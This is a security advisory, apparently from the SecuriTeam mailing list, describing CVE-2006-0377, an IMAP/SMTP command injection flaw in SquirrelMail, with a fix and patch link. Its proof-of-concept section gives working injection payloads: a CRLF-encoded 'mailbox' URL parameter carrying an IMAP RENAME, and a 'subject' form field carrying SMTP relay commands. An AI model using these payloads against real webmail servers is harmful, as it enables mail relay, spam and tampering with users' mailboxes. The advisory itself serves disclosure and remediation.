[UNIX] SquirrelMail IMAP/SMTP Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



SquirrelMail IMAP/SMTP Injection
------------------------------------------------------------------------


SUMMARY

<http://www.squirrelmail.org> SquirrelMail is "a standards-based webmail
package written in PHP4. It includes built-in pure PHP support for the
IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no
JavaScript required) for maximum compatibility across browsers. It has
very few requirements and is very easy to configure and install.
SquirrelMail has all the functionality you would want from an email
client, including strong MIME support, address books, and folder
manipulation". A vulnerability within SquirrelMail allows authenticated
remote attackers to inject arbitrary IMAP/SMTP commands into the
SquirrelMail's mail server's connection stream.

DETAILS

Vulnerable Systems:
* IMAP Injection: All versions prior to 1.4.6
* SMTP Injection: SquirrelMail version 1.2.7

Improper command and information validation transmitted by SquirrelMail to
the mail servers during the normal use of this application (mailbox
management, e-mail reading and sending, etc.) facilitates that an
authenticate malicious user could inject arbitrary IMAP/SMTP commands into
the mail servers used by SquirrelMail across parameters used by the
webmail front-end in its communication with these mail servers.

This is become dangerous because the injection of these commands allows an
intruder to evade restrictions imposed at application level, and exploit
vulnerabilities that could exist in the mail servers through IMAP/SMTP
commands.

Proof of Concept:
== IMAP example (1.4.2 version) =============
SquirrelMail Vulnerable parameter: "mailbox"

When a user clicks in the subject of an e-mail, he creates a GET request
as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1
&startMessage=1&show_more=0

A malicious user can modify the value of the "mailbox" parameter and
inject any IMAP command. The IMAP command injection has the following
structure:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0<ID>
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>
%20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1

Example:
Injection of the RENAME IMAP command across the "mailbox" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME
%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&
startMessage=1

== SMTP example (1.2.7 version) =============
SquirrelMail Vulnerable parameter: "subject" (and possibly others)

When a user send a message, he create a POST request like:
POST http://<victim>/src/compose.php HTTP/1.1

..
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
..

A malicious user can modify the value of the "subject" parameter and
inject any SMTP command.

Example: Relay from a non-existent e-mail address
..
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept%0d%0a.%0d%0a%0d%0amail from:
hacker@xxxxxxxxxx%0d%0arcpt to:
victim@xxxxxxxxxxxxxxx%0d%0adata%0d%0aThis is a proof of concept of
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a
-----------------------------84060780712450133071594948441
..

Impact:
The IMAP/SMTP command injection allow relay, SPAM, exploit IMAP and SMTP
vulnerabilities in the mail servers and evade all the restrictions at the
application layer.

Solution:
Replace \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: <http://www.squirrelmail.org/security/issue/2006-02-15>
http://www.squirrelmail.org/security/issue/2006-02-15

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0377>
CVE-2006-0377


ADDITIONAL INFORMATION

The information has been provided by <mailto:vaguilera@xxxxxxxxxxxxxxxx>
Vicente Aguilera Diaz.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages